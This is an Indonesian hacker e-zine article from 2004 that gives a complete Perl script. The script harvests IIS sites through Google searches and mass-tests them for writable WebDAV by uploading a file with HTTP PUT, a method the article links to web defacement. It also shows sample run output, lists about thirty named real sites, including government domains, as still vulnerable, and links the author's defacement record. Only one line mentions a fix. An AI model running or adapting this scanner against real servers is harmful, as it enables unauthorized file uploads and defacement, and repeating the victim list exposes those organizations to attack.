____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO-ZINE RELEASE 08 Author: bima_ || iko94@yahoo.com www.geocities.com/iko94 Online @ www.echo.or.id :: http://ezine.echo.or.id /********************************************************* * Webdav Mass Scanner menggunakan perl script * grab urls dari Google (bug lama). * * Impact : IIS * * oleh : iko (iko94@yahoo.com) * www.geocities.com/iko94 * release : august,09,2004 * * No Warranty. This tutorial is for educational use only, * commercial use is prohibited. * **********************************************************/ Anda pernah membaca artikel-artikel mengenai deface dari webfolder ? 1. http://www.jasakom.com/Artikel.asp?ID=495 2. http://ezine.echo.or.id/ezine6/ez-r06-beben-webfolder.txt Sebenarnya itu adalah bug webdav dari IIS (lagi-lagi). Hemmm, bug lawas ya ? Emang... :) Tapi apakah para admin cukup teliti dalam menjaga websitenya ? Kita lihat saja.... :)) Kali ini penulis akan menyajikan skrip scan massal dari google dengan sasaran bug webdav tersebut. *************awal potong di sini******************************** #!/usr/bin/perl # # [public version] # require LWP::UserAgent; use HTTP::Message; use URI::Escape; $baner=<<END Google put method lewat konsole... :)) END ; printlog($baner); $proxy = 'http://172.9.18.116:80/'; $log="put_lwp_google.log"; $fsav="put_google.txt"; $tempfile="put_temp.txt"; $komponen=$ARGV[0]; $usage = "Usage: perl $0 <keyword> Example : perl $0 \".co.id/*.asp\" \n"; if($#ARGV<0) { die "$usage"; } $ua = LWP::UserAgent->new; $ua->timeout(35); $ua->agent("MSIE/6.0 Windows"); $ua->proxy(http => $proxy) if defined($proxy); $browser = LWP::UserAgent->new; $browser -> agent($Agent); $browser->proxy(http => $proxy) if defined($proxy); $counter=0; #Read last session open(hf,$fsav); $lastsav=<hf>; close(hf); $check=1;#Check if any save session $nomer=1; while(1) { $gourl = "http://www.google.com/search?q=allinurl:$komponen&num=10&hl=en&lr=&ie=UTF-8&oe=utf-8&start=$counter&sa=N"; $grabresponse = $ua->get($gourl); $counter=$counter+10; if (!($grabresponse->is_success)) { printlog ($grabresponse->status_line. " Failure\n"); } else { $data1 = $grabresponse->as_string; open(lol,">$tempfile"); print lol $data1; close(lol); open(lol,$tempfile) || die("Cannot open the file"); @loli=<lol>; close(lol); $data=join("",@loli); exit if ($data=~/Google does not serve more than 1000/); #End Google search or Stop @tmp=split(/\<p class\=g\>\<a href\=http\:\/\//,$data); for ($a = 1; $a < $#tmp; $a++) { @u=split(/\>/,$tmp[$a]); @t=split(/\/mod/,$u[0]); $url=$t[0]; if (($lastsav ne "") && (!($lastsav =~ /$url/)) && $check) { next; } else { $check=0; } #Save Session open(hf,">$fsav"); print hf $url; close(hf); printlog("$nomer. http://$url\t"); $nomer++; @y=split(/\//,$url); $url=$y[0]; $urltarget="http://$url"; $urltarget=~s/ /%20/g; print "\nProcessing $urltarget.....\n"; $loginpost = $urltarget."/bima_test.html"; $loginrequest = HTTP::Request->new(PUT => $loginpost); $loginrequest->content_type('text/html'); $loginsend = 'tes tes tes 123'; $loginrequest->content-length($loginsend); $loginrequest->referer($urltarget); $loginrequest->content($loginsend); print "Proses PUT sedang berlangsung...\n"; $loginresponse = $browser->request($loginrequest); $logincek = $loginresponse->as_string; if (!($loginresponse->is_success)) { print ("$loginpost Failure\n"); printlog ("Gagal total ".$loginresponse->status_line. " Failure\n"); } else { print ("$loginpost Success\n"); printlog ($loginresponse->status_line. " could be Success\n"); #print "$logincek\n"; $req = HTTP::Request->new(GET => $loginpost); $req ->header('Accept' => 'text/html'); $res = $browser->request($req); if ($res->is_success) { $cekcek=$res->content=~/tes tes tes 123/g; if ($cekcek) { printlog ("\ncek url ".$res->status_line."\n"); # or whatever #printparse ($res->content); } else { #get printlog ("gak ada url, put gagal... ".$res->status_line."\n"); } } else { #put printlog ("gagal PUT file... ".$res->status_line."\n"); } } printlog("\n"); } #end of for } #end of if } #end of while sub printlog { print @_[0]; open(lo,">>$log"); print lo @_[0]; close(lo); return; } *************akhir potong di sini******************************** Outputnya akan seperti berikut ini: ***************************************************************** 178. http://www.cead.unp.ac.za/Applications.asp Processing http://www.cead.unp.ac.za..... Proses PUT sedang berlangsung... http://www.cead.unp.ac.za/bima_test.html Failure Gagal total 501 Not Implemented Failure 179. http://www.hicte.uwc.ac.za/default.asp?ShowToolbarAsImages=1 Processing http://www.hicte.uwc.ac.za..... Proses PUT sedang berlangsung... http://www.hicte.uwc.ac.za/bima_test.html Success 201 Created could be Success cek url 200 OK 180. http://www.expertise.und.ac.za/courses.asp Processing http://www.expertise.und.ac.za..... Proses PUT sedang berlangsung... http://www.expertise.und.ac.za/bima_test.html Failure Gagal total 403 Forbidden Failure ***************************************************************** Situs-situs yang masih vulner diantaranya : 1. http://www.ramadajarvis.co.uk/bima_test.html 2. http://www.bali.go.id/bima_test.html 3. http://www.inaweb.co.id/bima_test.html 4. http://www.setkab.go.id/bima_test.html 5. http://www.jasatirta1.go.id/bima_test.html 6. http://pmsserv.dki.go.id/bima_test.html 7. http://pmsserv.jakarta.go.id/bima_test.html 8. http://www.netflorist.co.za/bima_test.html 9. http://www.netcare.co.za/bima_test.html 10. http://www.autograph.co.za/bima_test.html 11. http://www.cid.co.za/bima_test.html 12. http://www.tableview.co.za/bima_test.html 13. http://www.chillies.co.za/bima_test.html 14. http://www.arrivealive.co.za/bima_test.html 15. http://www.merck.co.za/bima_test.html 16. http://www.forexafrica.co.za/bima_test.html 17. http://www.contractwork.co.za/bima_test.html 18. http://www.allesmotors.co.za/bima_test.html 19. http://www.ccma.org.za/bima_test.html 20. http://www.wbsa.org.za/bima_test.html 21. http://www.ntsika.org.za/bima_test.html 22. http://www.ibcsa.org.za/bima_test.html 23. http://www.nepa.org.za/bima_test.html 24. http://www.fe.techpta.ac.za/bima_test.html 25. http://www.software-e-commerce.com/bima_test.html 26. http://www.hicte.uwc.ac.za/bima_test.html 27. http://idlelo.uwc.ac.za/bima_test.html 28. http://www.southafricahc.org.sg/bima_test.html 29. http://www.westerncapepremier.gov.za/bima_test.html 30. http://www.ruralnews.co.nz/bima_test.html Dan masih banyak lagi... http://www.zone-h.org/en/defacements/filter/filter_defacer=bima+%5Bat%5D+www.neoteker.or.id/ Salah satu solusi : matikan pilihan write di konfigurasi IIS. Cukup sekian yang bisa penulis sampaikan. :)) REFERENSI : 1. Bukunya S'to Seni Internet Hacking 2. ActiveState ActivePerl 5.8 Documentation 3. Bukunya REGEX Steven Haryanto *very very very special greetz to: [+][+][+] my beloved anna [+][+][+] *shout to dhanny firman syah : keep fighting, bro... *special greetz to: [+] www.neoteker.or.id [+] www.echo.or.id [+] www.bosen.net [+] www.waraxe.us [+] qq [+] tiyox [+] bosen [+] ftp_geo [+] sakitjiwa [+] tiong [+] all #1stlink #neoteker #e-c-h-o #batamhacker #kartubeben #antihackerlink crew @ dal net [+] all #1stlink #romance #hackers @ centrin [+] alphacentupret, fuzk3 kendi [+] boeboe (dah kehabisan target yach...) [+] y3d1ps, z3r0byt3, biatch-x, K-159, Cmaster4 *contact: [+] iko94(at)yahoo(dot)com [+] www.geocities.com/iko94 [+] www.neoteker.or.id [EOF] |